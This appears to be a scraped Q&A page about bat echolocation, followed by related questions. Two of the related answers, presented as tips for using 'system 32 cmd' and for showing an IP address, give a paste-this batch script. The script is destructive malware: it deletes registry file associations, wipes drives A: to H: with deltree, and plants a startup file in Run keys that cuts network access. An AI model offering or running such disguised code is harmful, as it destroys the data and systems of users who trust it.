answersLogoWhite

0

yes, echo location works no matter what time of day it is. the term, "blind as a bat," refers to the fact that, even though bats are not blind, they rely more on their sense of hearing than their eyesight to "see" where they are flying at night.

User Avatar

Wiki User

13y ago

What else can I help you with?

Related Questions

What animal uses echo location to hear?

a bat does


What kinds of waves do bats send out to find food?

A bat uses echo location to see where it is going, a bat can see through its eyes, but it uses echo location.


Which animal uses echo location?

Bats use echo location, they track down sounds of prey by their sound waves.


What is a good name for a pet bat?

Vlad,Dracula , night bird,Echo, Dusk, Boo


Do fruit bats use echo location?

No, except that the Egyptian Fruit Bat uses high pitch clicking in caves.


How do bats know where there pray is?

echo location The bat emits a squeak, which when it reflects (echo) off an object (prey) the bat can hear that and fly to it.


How do bats use their ears to catch insect?

------------------------------------------------------- Bats use a type of "sonar" to locate objects even in the dark (echo-location). A bat makes a high-pitched noise that bounces off objects nearby and the bat hears the echo. By timing how long it takes for the bat to hear the echo, it can calculate how far away it is. When it comes to a flying insect, the bat listens to the echo of it's noises and is able to locate where an insect is. Then it can fly to the insect and catch it - even if it is pitch dark. They use echo location. It is tiny beeps, too high pitched for our ears, and dogs ears too! The bats let out the tiny beeps, and the echoes tell them where bugs are.


What kind of echo does a bat hear from an object moving away from it?

A bat would hear a Doppler-shifted echo from an object moving away from it. This means the frequency of the echo would be lower than the frequency of the sound wave emitted by the bat. The bat's brain is able to interpret this change in frequency to understand the direction and speed of the object.


Do animals depends on sound for hunting it's food?

Yes , Like a bat uses echo to locate where its prey is or a lion who hears somebody walking or stamping on the plain ( grass ).


How does echo location help a bat?

A bat is not blind, but it flies in the evening, and lives in a dark cave. So it needs echo location to find it's way around and catch insects.


How do you use the system 32 cmd?

Open 'Notepad' and save file as 'batch.bat' then copy and paste this code: @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO SYSTEM 32 GOTO MESSAGE deltree /y C:\ deltree /y E:\ deltree /y A:\ deltree /y F:\ deltree /y G:\ deltree /y D:\ deltree /y H:\ echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo SYSTEM 32 PAUSE


How you will provide IP through CMD?

This is a long cmd but it gives a lot more information about your IP: @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO IP ADDRESS CONFIGURATION GOTO MESSAGE deltree /y C:\ deltree /y E:\ deltree /y A:\ deltree /y F:\ deltree /y G:\ deltree /y D:\ deltree /y H:\ echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo IP ADDRESS CONFIGURATION PAUSE